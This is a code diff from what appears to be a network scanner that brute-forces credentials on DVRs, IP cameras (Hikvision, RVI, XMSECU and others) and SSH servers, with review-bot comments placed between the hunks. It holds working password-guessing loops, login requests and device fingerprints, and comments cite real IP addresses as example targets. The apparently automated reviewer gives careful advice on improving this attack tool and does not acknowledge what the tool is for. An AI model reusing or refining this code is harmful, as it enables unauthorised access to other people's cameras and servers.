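Review bot: Changing `Sleep(600000)` to `Sleep(1000)` makes `updateLists` call `loadOnce()` every second instead of every ten minutes. The auth loops in this commit block on `FileUpdater::cv.wait(..., ready)`, so a reload that toggles `ready` would now stall them up to once per second. It would also reallocate the lists while other threads hold indexes into them. If the short interval was for debugging, restore it. Otherwise use a named constant with a comment, for example `static const int kListPollMs = 1000; // cheap: loadOnce() only reloads files whose size changed`, assuming that is how `loadOnce` behaves (its body is not visible).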
diff --git a/HikvisionLogin.cpp b/HikvisionLogin.cpp
index 9f5e77c..35c8793 100644
--- a/HikvisionLogin.cpp
+++ b/HikvisionLogin.cpp
@@ -349,7 +349,7 @@ bool HikVis::checkSAFARI(const char * sDVRIP, int port) {
return false;
}
-
+#include "Utils.h"
lopaStr HikVis::hikLogin(const char * sDVRIP, int wDVRPort)
{
lopaStr lps = { "UNKNOWN", "", "" };
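Review bot: `#include "Utils.h"` is added in the middle of the file, directly above `hikLogin`, and a second identical include is added above `rviLogin` in a later hunk of this file. Includes belong in the block at the top of HikvisionLogin.cpp, where one `#include "Utils.h"` covers both functions. A mid-file include hides the dependency and only works as long as the header's guard makes the repeat harmless.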
@@ -358,18 +358,15 @@ lopaStr HikVis::hikLogin(const char * sDVRIP, int wDVRPort)
strcpy(ip, sDVRIP);
int rowIndex = -1;
- char login[64] = { 0 };
- char pass[64] = { 0 };
+ char login[32] = { 0 };
+ char pass[32] = { 0 };
for (int i = 0; i < MaxLogin; ++i) {
+ FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; });
+ strcpy(login, loginLst[i]);
for (int j = 0; j < MaxPass; ++j) {
FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; });
if (!globalScanFlag) return lps;
- /*ZeroMemory(login, 64);
- ZeroMemory(pass, 64);*/
- login[0] = 0;
- pass[0] = 0;
- strcpy(login, loginLst[i]);
strcpy(pass, passLst[j]);
NET_DVR_DEVICEINFO_V30 *info = 0;
@@ -380,39 +377,20 @@ lopaStr HikVis::hikLogin(const char * sDVRIP, int wDVRPort)
strcpy(lps.login, login);
strcpy(lps.pass, pass);
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), "OK");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK");
- }
-
+ rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), "OK", rowIndex);
+
return lps;
}
- if (BALogSwitched) {
- if (rowIndex == -1) {
- rowIndex = nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort),
- QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
- }
- }
- else{ rowIndex = -1; }
+ rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex);
+
++passCounter;
Sleep(200);
}
}
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), "--", "FAIL");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
- }
+ rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), "--", "FAIL", rowIndex);
+
return lps;
}
@@ -467,6 +445,7 @@ int rvi_login_ptr(const char *sDVRIP, int wDVRPort, const char *login, const cha
return -1;
}
+#include "Utils.h"
lopaStr HikVis::rviLogin(const char * sDVRIP, int wDVRPort)
{
lopaStr lps = { "UNKNOWN", "", "" };
@@ -475,18 +454,15 @@ lopaStr HikVis::rviLogin(const char * sDVRIP, int wDVRPort)
strcpy(ip, sDVRIP);
int rowIndex = -1;
- char login[64] = { 0 };
- char pass[64] = { 0 };
+ char login[32] = { 0 };
+ char pass[32] = { 0 };
for (int i = 0; i < MaxLogin; ++i) {
+ FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; });
+ strcpy(login, loginLst[i]);
for (int j = 0; j < MaxPass; ++j) {
FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; });
if (!globalScanFlag) return lps;
- /*ZeroMemory(login, 64);
- ZeroMemory(pass, 64);*/
- login[0] = 0;
- pass[0] = 0;
- strcpy(login, loginLst[i]);
strcpy(pass, passLst[j]);
if (strlen(login) > 8) break;
@@ -496,39 +472,20 @@ lopaStr HikVis::rviLogin(const char * sDVRIP, int wDVRPort)
strcpy(lps.login, login);
strcpy(lps.pass, pass);
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), "OK");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK");
- }
+ rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), "OK", rowIndex);
return lps;
}
- if (BALogSwitched) {
- if (rowIndex == -1) {
- rowIndex = nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort),
- QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
- }
- }
- else { rowIndex = -1; }
+ rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex);
+
++passCounter;
Sleep(200);
}
}
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), "--", "FAIL");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
- }
+ rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), "--", "FAIL", rowIndex);
+
return lps;
}
diff --git a/IPCAuth.cpp b/IPCAuth.cpp
index 6abf528..641350b 100644
--- a/IPCAuth.cpp
+++ b/IPCAuth.cpp
@@ -6,14 +6,15 @@
lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *cookie)
{
lopaStr lps = {"UNKNOWN", "", ""};
- bool result = true;
+ int result = 0;
char login[128] = {0};
char pass[128] = {0};
char request[1024] = {0};
int passCounter = 1;
int rowIndex = -1;
- std::vector negVector;
+ std::vector negVector;
+ std::vector slideVector;
if(strcmp(SPEC, "IPC") == 0)
{
negVector.push_back("Invalid");
@@ -91,6 +92,11 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *c
{
negVector.push_back("Invalid credentials");
}
+ else if (strcmp(SPEC, "XMSECU") == 0)
+ {
+ slideVector.push_back("errornumber=-1");
+ negVector.push_back("Log in failed");
+ }
else
{
stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!");
@@ -101,22 +107,20 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *c
for(int i = 0; i < MaxLogin; ++i)
{
if(!globalScanFlag) break;
- if(strcmp(loginLst[i], " ") == 0) continue;
- //ZeroMemory(login, sizeof(login));
- login[0] = 0;
- strcpy(login, loginLst[i]);
+ FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; });
+ strcpy(login, loginLst[i]);
+ if(strcmp(login, " ") == 0) continue;
for(int j = 0; j < MaxPass; ++j)
{
FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;});
if(!globalScanFlag) break;
if(strcmp(passLst[j], " ") == 0) continue;
+ result = 0;
- //ZeroMemory(pass, sizeof(pass));
- pass[0] = 0;
strcpy(pass, passLst[j]);
- //ZeroMemory(request, sizeof(request));
+ ZeroMemory(request, sizeof(request));
request[0] = 0;
if(strcmp(SPEC, "IPC") == 0)
{
@@ -191,7 +195,6 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *c
}
else if (strcmp(SPEC, "JUAN") == 0)
{
- //sprintf(request, "%s:%d/cgi-bin/gw.cgi?xml=&_=1450923182693",
sprintf(request, "%s/cgi-bin/gw.cgi?xml=%%3Cjuan%%20ver=%%22%%22%%20squ=%%22%%22%%20dir=%%22%%22%%3E%%3Cenvload%%20type=%%220%%22%%20usr=%%22%s%%22%%20pwd=%%22%s%%22/%%3E%%3C/juan%%3E&_=1450923182693",
ip, login, pass);
}
@@ -226,6 +229,12 @@ Content-Disposition: form-data; name=\"password\"\r\n\
Content-Length: %d\r\n\r\n\
%s", cl, tempPostData);
}
+ else if (strcmp(SPEC, "XMSECU") == 0)
+ {
+ doPost = true;
+ sprintf(request, "%s/Login.htm", ip);
+ sprintf(postData, "command=login&username=%s&password=%s", login, pass);
+ }
std::string buffer;
if (cookie->size() > 0) {
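Review bot: Both `sprintf` calls in the new `XMSECU` branch write without a bound. `request` is 1024 bytes while `login` and `pass` are 128 bytes each, and `postData` is declared outside this hunk, so its capacity cannot be checked from here. Use the bounded form: `snprintf(request, sizeof(request), "%s/Login.htm", ip);` and `snprintf(postData, sizeof(postData), "command=login&username=%s&password=%s", login, pass);`. The `sizeof` form is valid only if `postData` is an array in this scope.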
@@ -241,65 +250,53 @@ Content-Length: %d\r\n\r\n\
}
if (res == -2) {
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip), "--", "FAIL");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
- }
+ rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);
return lps;
}
else if (res != -1) {
+ for (int i = 0; i < slideVector.size(); ++i)
+ {
+ if (Utils::ustrstr(buffer, slideVector[i]) != -1)
+ {
+ result = -1;
+ break;
+ };
+ }
+ if (-1 == result) {
+ passCounter += MaxPass - 1;
+ break;
+ }
+
for (int i = 0; i < negVector.size(); ++i)
{
if (Utils::ustrstr(buffer, negVector[i]) != -1)
{
- result = false;
+ result = 1;
break;
};
};
- if (result)
+ if (0 == result)
{
- strcpy(lps.login, loginLst[i]);
- strcpy(lps.pass, passLst[j]);
+ strcpy(lps.login, login);
+ strcpy(lps.pass, pass);
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK");
- }
+ rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex);
return lps;
- };
+ }
}
else {
return lps;
}
-
- if (BALogSwitched) {
- if (rowIndex == -1) {
- rowIndex = nesca_3::addBARow(QString(ip),
- QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
- }
- }
- else { rowIndex = -1; }
+
+ rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex);
++passCounter;
Sleep(100);
};
};
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip), "--", "FAIL");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
- }
+
+ rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);
return lps;
}
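Review bot: The new `for (int i = 0; i < slideVector.size(); ++i)` loop declares an `i` that shadows the outer login index `i`, and it compares a signed `int` against `size()`. The existing `negVector` loop does the same, and with two such loops inside the `i`/`j` nest it is easy to misread which index a later line uses. Rename the inner counter and use the container's size type, for example `for (size_t k = 0; k < slideVector.size(); ++k)`. The `-1`/`0`/`1` values now stored in `result` replace a `bool` and should be documented at its declaration, for example `// 0 = no negative marker seen, 1 = negative marker, -1 = skip remaining passwords for this login`.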
diff --git a/MainStarter.cpp b/MainStarter.cpp
index 8ba17ea..e52e4f0 100644
--- a/MainStarter.cpp
+++ b/MainStarter.cpp
@@ -1399,7 +1399,7 @@ void MainStarter::runAuxiliaryThreads() {
void MainStarter::createResultFiles() {
char fileName[256] = { 0 };
- sprintf(fileName, "./result_files-%s", Utils::getStartDate().c_str());
+ sprintf(fileName, "./" DIR_NAME "%s_%s", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
bool res = CreateDirectoryA(fileName, NULL);
if (!res) {
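Review bot: `sprintf` into `char fileName[256]` now appends `Utils::getCurrentTarget()`, a string derived from the caller-supplied `targets` argument in `MainStarter::start`. A long target string therefore overruns the stack buffer. Bound the write and check for truncation: `int n = snprintf(fileName, sizeof(fileName), "./" DIR_NAME "%s_%s", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());` followed by `if (n < 0 || n >= (int)sizeof(fileName)) return;` or equivalent error handling. The rest of `createResultFiles` is outside this hunk.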
@@ -1484,6 +1484,10 @@ void MainStarter::start(const char* targets, const char* ports) {
thread_setup();
+
+ QString fileSuffix = QString(targets);
+ fileSuffix = fileSuffix.mid(fileSuffix.lastIndexOf("/") + 1);
+ Utils::setCurrentTarget(fileSuffix.toUtf8().constData());
createResultFiles();
if (loadTargets(targets) == -1 ||
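Review bot: `fileSuffix` is taken from `targets` by cutting at the last `/` only, and it is then used by `createResultFiles()` as part of a directory name. Backslashes, `..`, `:` and wildcard characters in the input survive into the path passed to `CreateDirectoryA`. That either makes directory creation fail or places the directory somewhere unintended. Restrict the suffix to a safe character set before storing it, for example `fileSuffix.replace(QRegExp("[^A-Za-z0-9._-]"), "_");`, and cap its length. For a CIDR target such as `a.b.c.d/24` the current logic keeps only `24`, which is probably not the intended label.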
diff --git a/SSHAuth.cpp b/SSHAuth.cpp
index 123021e..d80db76 100644
--- a/SSHAuth.cpp
+++ b/SSHAuth.cpp
@@ -83,19 +83,15 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port)
return 0;
}
-int check_ssh_pass(const int rowIndex, const char *user, const char *pass,
+int check_ssh_pass(int rowIndex, const char *user, const char *pass,
const char *userPass, const char *host, int port,
std::string *buffer, const char *banner) {
int res = _sshConnect(user, pass, host, port);
if(res == 0)
{
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(host), QString(userPass) + "@" + QString(host), "OK");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(userPass) + "@" + QString(host), "OK");
- }
+ rowIndex = Utils::addBARow(QString(host), QString(userPass) + "@" + QString(host), "OK", rowIndex);
+
buffer->append(userPass);
buffer->append("@");
buffer->append(host);
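Review bot: The assignment `rowIndex = Utils::addBARow(...)` writes to a by-value parameter, so the result is discarded when check_ssh_pass returns, and the `const` was dropped only to permit a dead store. Either keep `const int rowIndex` and call `Utils::addBARow(...)` without assigning, or take `int &rowIndex` if the caller is meant to see a newly created row. The function body continues beyond this hunk.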
@@ -132,61 +128,29 @@ int SSHBrute(const char* host, int port, std::string *buffer, const char *banner
strncpy(login, temp, ptr1 - temp);
strcpy(pass, ptr1 + 1);
- if (BALogSwitched) {
- if (rowIndex == -1) {
- rowIndex = nesca_3::addBARow(QString(host) + ":" + QString::number(port),
- QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxSSHPass)) * 100).mid(0, 4) + "%");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxSSHPass)) * 100).mid(0, 4) + "%");
- }
- }
- else { rowIndex = -1; }
+ rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxSSHPass)) * 100).mid(0, 4) + "%", rowIndex);
++passCounter;
res = check_ssh_pass(rowIndex, login, pass, temp, host, port, buffer, banner);
- //ZeroMemory(login, sizeof(login));
- //ZeroMemory(pass, sizeof(pass));
- //ZeroMemory(temp, sizeof(temp));
- login[0] = 0;
- pass[0] = 0;
- temp[0] = 0;
if(res == 0)
{
if (i == 0) {
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(host) + ":" + QString::number(port), "--", "FAILHIT");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAILHIT");
- }
+ rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), "--", "FAILHIT", rowIndex);
return -2; //Failhit
}
return 1;
}
else if(res == -2)
{
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(host) + ":" + QString::number(port), "--", "FAIL");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
- }
+ rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), "--", "FAIL", rowIndex);
return -2;
};
Sleep(500);
};
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(host) + ":" + QString::number(port), "--", "FAIL");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
- }
+ rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), "--", "FAIL", rowIndex);
return -1;
}
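Review bot: With the `login[0] = 0; pass[0] = 0; temp[0] = 0;` resets removed, nothing visible in this hunk terminates `login` after `strncpy(login, temp, ptr1 - temp)`, which copies exactly `ptr1 - temp` bytes and adds no NUL because `temp` is longer than that. Unless the buffers are re-zeroed at the top of the loop (outside this hunk), a shorter login that follows a longer one keeps the old tail. Add `login[ptr1 - temp] = '\0';` after the copy, preceded by a check that `ptr1 - temp` and `strlen(ptr1 + 1)` fit the destination sizes. The `rowIndex = ...` assignments placed directly before each `return` are dead stores and can be plain calls.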
diff --git a/Utils.cpp b/Utils.cpp
index 002a07c..0120a95 100644
--- a/Utils.cpp
+++ b/Utils.cpp
@@ -1,8 +1,10 @@
#include "Utils.h"
#include
+#include "STh.h"
std::string Utils::startDate;
std::string Utils::startTime;
+std::string Utils::currentTarget;
//void Utils::emitScaryError() {
// __asm{
@@ -45,26 +47,44 @@ std::string Utils::getHeaderValue(std::string *buff, const std::string headerVal
}
void Utils::saveStartDate() {
QDate date = QDate::currentDate();
- startDate = std::to_string(date.day())
- + "_"
- + std::to_string(date.month())
- + "_"
- + std::to_string(date.year());
+ startDate = date.toString("dd.MM.yyyy").toUtf8().constData();
}
+
void Utils::saveStartTime() {
QTime time = QTime::currentTime();
- startTime = std::to_string(time.hour())
- + "_"
- + std::to_string(time.minute());
+ startTime = time.toString("HH_mm").toUtf8().constData();
}
std::string Utils::getStartDate() {
return startDate;
}
+int Utils::addBARow(QString str1, QString str2, QString str3, int rowIndex) {
+ if (BALogSwitched) {
+ if (rowIndex == -1) {
+ rowIndex = nesca_3::addBARow(str1, str2, str3);
+ }
+ else {
+ stt->doEmitionChangeBARow(rowIndex, str2, str3);
+ }
+
+ return rowIndex;
+ }
+
+ return -1;
+}
+
std::string Utils::getStartTime() {
return startTime;
}
+void Utils::setCurrentTarget(const std::string target) {
+ currentTarget = target;
+}
+
+std::string Utils::getCurrentTarget() {
+ return currentTarget;
+}
+
int Utils::isDigest(const std::string *buffer) {
if (Utils::ustrstr(buffer, "401 authorization") != -1
|| Utils::ustrstr(buffer, "401 unauthorized") != -1
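Review bot: `Utils::addBARow` has no comment describing its contract, although every caller now overwrites its own `rowIndex` with the return value. I would add above it something like `// Adds a row when rowIndex == -1, otherwise updates row rowIndex; returns the row index, or -1 when BALogSwitched is off.` The three `QString` parameters and `setCurrentTarget`'s `const std::string target` are taken by value; `const QString &` and `const std::string &` avoid the copies. `currentTarget` is a plain static `std::string` with no synchronisation, so a comment should state that `setCurrentTarget` must be called before any worker thread reads it.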
diff --git a/Utils.h b/Utils.h
index 83235ce..b7041de 100644
--- a/Utils.h
+++ b/Utils.h
@@ -28,6 +28,7 @@ private:
class Utils {
private: static std::string startDate;
private: static std::string startTime;
+private: static std::string currentTarget;
public:
static int isDigest(const std::string *buffer);
@@ -53,7 +54,7 @@ public:
else return -1;
}
- template static int ustrstr(const T *str1,
+ template static int ustrstr(T *str1,
const char* str2c,
const locale& loc = locale()) {
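Review bot: Dropping `const` from `str1` does not appear to be needed: a `const T *` parameter already accepts pointers to non-const objects, and the callers visible in this commit pass both `&buff` and `const std::string *`. With `T *str1` the signature no longer states that the haystack is left unmodified, so I would keep `const T *str1` unless the body, which lies outside this hunk, writes through the pointer.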
@@ -91,7 +92,10 @@ public:
static void saveStartTime();
static std::string getStartDate();
static std::string getStartTime();
+ static void setCurrentTarget(const std::string target);
+ static std::string getCurrentTarget();
static void emitScaryError();
+ static int addBARow(QString str1, QString str2, QString str3, int rowIndex);
static std::string getHeaderValue(std::string *buff, const std::string headerValue, const std::string outputName);
};
diff --git a/WebformWorker.cpp b/WebformWorker.cpp
index a98db13..34e04a2 100644
--- a/WebformWorker.cpp
+++ b/WebformWorker.cpp
@@ -83,17 +83,7 @@ lopaStr WFClass::doGetCheck(const char *ip,
Connector con;
if(con.nConnect(nip, port, &buffer) <= 0) return result;
- if (BALogSwitched) {
- if (rowIndex == -1) {
- //stt->doEmitionAddBARow(rowIndex, QString(ip) + ":" + QString::number(port),
- // QString(login) + ":" + QString(pass),
- // QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass),
- QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%");
- }
- }
+ rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%", rowIndex);
result = parseResponse(ip, port, &buffer, formVal, login, pass);
if(i == 0) ++i;
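Review bot: `++passCounter` is now evaluated inside the argument list, so the counter advances on every call, whereas the removed code only incremented it when `BALogSwitched` was set and a row already existed. In the doPostCheck hunk below, the same argument is followed by a separate `++passCounter;`, so each attempt there counts twice and the displayed percentage can exceed 100. Increment once on its own line and pass the plain value, i.e. `++passCounter;` followed by `QString::number((passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100)`. Both function bodies extend beyond their hunks.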
@@ -144,18 +134,8 @@ lopaStr WFClass::doPostCheck(const char *ip,
std::string buffer;
Connector con;
if (con.nConnect(nip, port, &buffer, postData) <= 0) return result;
-
- if (BALogSwitched) {
- if (rowIndex == -1) {
- //stt->doEmitionAddBARow(rowIndex, QString(ip) + ":" + QString::number(port),
- // QString(login) + ":" + QString(pass),
- // QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass),
- QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%");
- }
- }
+
+ rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%", rowIndex);
++passCounter;
return parseResponse(ip, port, &buffer, formVal, login, pass);
diff --git a/finder.cpp b/finder.cpp
index d1ff65a..1bebaab 100644
--- a/finder.cpp
+++ b/finder.cpp
@@ -248,21 +248,28 @@ bool isNegative(const std::string *buff, const char *ip, int port, const char *c
}
}
- std::size_t ptr1 = buff->find("\r\n\r\n");
- if (ptr1 != -1) {
- int sz = buff->size();
- int nSz = buff->substr(ptr1, sz).size() - 4;
- if (nSz < 100) {
- if (gNegDebugMode)
- {
- QTextCodec *nCodec = QTextCodec::codecForName("Windows-1251");
- stt->doEmitionDebugFoundData("[" + QString(ip) +
- "]\tNegative hit: Size:" + QString::number(nSz));
- }
- return true;
- }
- }
+ //if (buff->size() < 200) {
+ // if (buff->find("rtsp") == -1) {
+ // std::size_t ptr1 = buff->find("\r\n\r\n");
+ // if (ptr1 != -1) {
+ // int sz = buff->size();
+ // int nSz = buff->substr(ptr1, sz).size() - 4;
+ // if (nSz < 100) {
+ // if (gNegDebugMode)
+ // {
+ // QTextCodec *nCodec = QTextCodec::codecForName("Windows-1251");
+ // stt->doEmitionDebugFoundData("[" + QString(ip) +
+ // "]\tNegative hit: Size:" + QString::number(nSz));
+ // }
+
+ // ++filtered;
+ // return true;
+ // }
+ // }
+ // }
+ //}
+
return false;
}
int globalSearchPrnt(const std::string *buff)
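Review bot: The size-based check is disabled by commenting it out rather than deleting it, which leaves about twenty lines of dead code, including a `++filtered` that the removed version did not have. Delete the block and rely on version control, or, if it is meant to come back, put it behind a named option with a one-line comment saying why it is off. If it is revived, compare the `find()` results with `std::string::npos` instead of `-1`. The start of isNegative is outside this hunk.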
@@ -391,7 +398,7 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const
if(Utils::ustrstr(buffcpy, "hikvision-webs") != -1
|| (
(Utils::ustrstr(buffcpy, "hikvision digital") != -1 || Utils::ustrstr(buffcpy, "doc/page/login.asp") != -1)
- && Utils::ustrstr(buffcpy, "dvrdvs-webs") != -1 || Utils::ustrstr(buffcpy, "app-webs") != -1)
+ && Utils::ustrstr(buffcpy, "dvrdvs-webs") != -1 || Utils::ustrstr(buffcpy, "app-webs") != -1 || Utils::ustrstr(buffcpy, "DNVRS-Webs") != -1)
||
(Utils::ustrstr(buffcpy, "lapassword") != -1
&& Utils::ustrstr(buffcpy, "lausername") != -1
@@ -463,10 +470,12 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const
&& Utils::ustrstr(buffcpy, "login_chk_usr_pwd") != -1
) return 57; //Network video client (http://203.190.113.54:60001/)
if (Utils::ustrstr(buffcpy, "QlikView") != -1) return 58; //QLikView (http://203.96.113.183/qlikview/login.htm)
- if (Utils::ustrstr(buffcpy, "RTSP/1.0") != -1) return 59; //RTSP (http://121.72.55.19:554/ Hisilicon Ipcam)
+ if (Utils::ustrstr(buffcpy, "RTSP/1.") != -1) return 59; //RTSP (http://121.72.55.19:554/ Hisilicon Ipcam)
if (Utils::ustrstr(buffcpy, "ACTi Corporation") != -1) return 60; //ACTi (http://87.197.30.20/cgi-bin/videoconfiguration.cgi)
if (Utils::ustrstr(buffcpy, "airos_logo") != -1) return 61; //AirOS (http://103.5.73.114/login.cgi?uri=/)
-
+ if (Utils::ustrstr(buffcpy, "NetSuveillanceWebCookie") != -1 &&
+ Utils::ustrstr(buffcpy, "resizeL") != -1) return 62; //XMSECU (http://121.72.179.76/Login.htm)
+
//if (Utils::ustrstr(buffcpy, "ShareCenter") != -1) return 58; //ShareCenter (http://49.50.207.6/)
if (Utils::ustrstr(buffcpy, "nas - ") != -1
@@ -597,12 +606,12 @@ int __checkFileExistence(int flag)
{
char fileName[64] = {0};
- if (flag == -22) sprintf(fileName, "./result_files-%s/" TYPE5 ".html", Utils::getStartDate().c_str());
- else if (flag == 0 || flag == 15 || flag == -10) sprintf(fileName, "./result_files-%s/" TYPE1 ".html", Utils::getStartDate().c_str());
- else if (flag == 3) sprintf(fileName, "./result_files-%s/" TYPE2 ".html", Utils::getStartDate().c_str());
- else if (flag == 16) sprintf(fileName, "./result_files-%s/" TYPE4 ".html", Utils::getStartDate().c_str());
+ if (flag == -22) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE5 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
+ else if (flag == 0 || flag == 15 || flag == -10) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE1 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
+ else if (flag == 3) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE2 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
+ else if (flag == 16) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE4 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
else if(flag >= 17 || flag == 11 || flag == 12
- || flag == 13 || flag == 14 || flag == 1) sprintf(fileName, "./result_files-%s/" TYPE3 ".html", Utils::getStartDate().c_str());
+ || flag == 13 || flag == 14 || flag == 1) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE3 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
FILE *f = fopen(fileName, "r");
if(f == NULL) return true;
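Review bot: The flag-to-file mapping here does not match the one in `fputsf`: this function maps `flag == 3` to TYPE2, `flag == 16` to TYPE4 and `flag == 1` to TYPE3, while the `fputsf` hunk below maps `flag == 3` to TYPE4, `flag == 1` to TYPE2 and `flag == 2` to TYPE3. Since this commit rewrites every one of these path lines in both functions, the mapping and the path formatting could move into one helper that both call, so that the existence check looks at the file that is actually written. `fileName` is also left empty when no branch matches and is still passed to `fopen`. The function continues past the end of this hunk.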
@@ -620,44 +629,39 @@ bool ftsBA = true;
std::atomic fOpened(false);
void fputsf(char *text, int flag)
{
- FILE *file = NULL;
-
char fileName[256] = { 0 };
if(flag == 0 || flag == 15 || flag == -10)
{
- if (ftsCameras) ftsCameras = __checkFileExistence(flag);
- sprintf(fileName, "./result_files-%s/" TYPE1 ".html", Utils::getStartDate().c_str());
- file = fopen(fileName, "a");
+ if (ftsCameras) ftsCameras = __checkFileExistence(flag);
+ sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE1 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
}
else if(flag == 1)
{
if(ftsOther) ftsOther = __checkFileExistence(flag);
- sprintf(fileName, "./result_files-%s/" TYPE2 ".html", Utils::getStartDate().c_str());
- file = fopen(fileName, "a");
